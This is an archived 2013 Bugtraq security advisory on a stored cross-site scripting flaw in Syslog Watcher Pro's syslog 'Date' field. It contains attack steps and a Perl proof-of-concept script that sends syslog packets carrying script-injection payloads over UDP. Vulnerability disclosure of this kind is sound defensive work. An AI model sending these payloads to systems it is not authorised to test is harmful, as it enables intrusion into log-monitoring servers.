lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201304300941.r3U9f3pZ005072@sf01web1.securityfocus.com>
Date: Tue, 30 Apr 2013 09:41:03 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting
 Vulnerability

Title: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability
Software : Syslog Watcher Pro

Software Version : v2.8.0.812(Jun 15, 2009)

Vendor: http://www.snmpsoft.com/

Vulnerability Published : 2013-04-27

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 6.4, AV:N/AC:L/Au:N/C:P/I:P/A:N)

Bug Description :
Syslog Watcher Pro is a Windows-based syslog server for corporate networks.
Syslog Watcher Pro collects, stores, parses, displays and explains syslog information to both new and professional network administrators.
Syslog Watcher Pro(v2.8.0.812) is vulnerable to XSS by 'Date' Parameter of syslog protocol.

How to Attack :
STEP 1: Send a syslog packet which contained XSS code into 'Date' Parameter to Syslog Watcher Pro.
STEP 2: Syslog Watcher Pro put XSS code into database.
STEP 3: XSS code will be executed after victim generate and view report by Syslog Watcher Pro.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
$|=1;

$host=shift;
$port=shift;

if(defined($host) && defined($port)){
	;
}else{
	die "usage: $0 host port\n";
}

$con=new IO::Socket::INET->new(PeerPort=>$port,
        Proto=>'udp',
        PeerAddr=>$host);

$npriority = '<0>';
$nhostname = "10.0.0.2";
$npid = 'test[10]';
$nmsg = "testing by demonalex";

$testcase1="<script>alert(\"XSS1\")</script>";
$testcase2="<script>alert(/XSS2/)</script>";

#testcase1
$header = $testcase1.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

#testcase2
$header = $testcase2.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

$con->close;

print "Over!\n";

exit(1);
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@...nect.polyu.hk
Independent Researcher
DBAPPSecurity Co.,Ltd./Hong Kong PolyU

Powered by blists - more mailing lists